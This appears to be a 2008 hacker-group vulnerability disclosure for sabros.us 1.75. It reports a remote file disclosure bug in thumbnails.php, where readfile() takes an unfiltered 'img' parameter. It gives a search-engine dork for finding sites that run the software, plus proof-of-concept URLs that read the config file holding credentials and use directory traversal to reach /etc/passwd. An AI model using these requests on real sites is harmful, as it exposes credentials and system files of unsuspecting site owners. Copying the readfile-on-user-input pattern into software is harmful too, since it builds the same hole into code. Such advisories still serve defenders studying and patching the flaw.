sabros.us 1.75 (thumbnails.php) Remote File Disclosure Vulnerability

2008-04-04 00:00:00

#######################################################
<<<<<< Remote File Disclosure Vulnerability >>>>>>
sabrosus 1.75 (thumbnails.php)
#######################################################

## AUTHOR : HaCkeR_EgY
## My HoMe : www.PaL-HaCker.com
## ConTacT : [email protected]

###############################################################################
## Download Script : http://sourceforge.net/project/downloading.php?groupname=sabrosus&filename=sabrosus1-75.zip&use_mirror=garr

## vurn C0de :
in (thumbnails.php)
line 82
readfile ($img) <===

## Dork : Powered by sabros.us

## PoC: http://localhost/sabrosus/thumbnails.php?img=include/config.php
http://localhost/sabrosus/thumbnails.php?img=../../../../../../../../etc/passwd

#################################################################################

## GREETZ TO : My BrOther and My MasTer " Abo Mohamed "

## Thanx : FiReSell , MoHamed EL Arab , Mr.exe , zaradusht , M$s D@nG3rS ,and all " pal-hacker members "

#####################################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.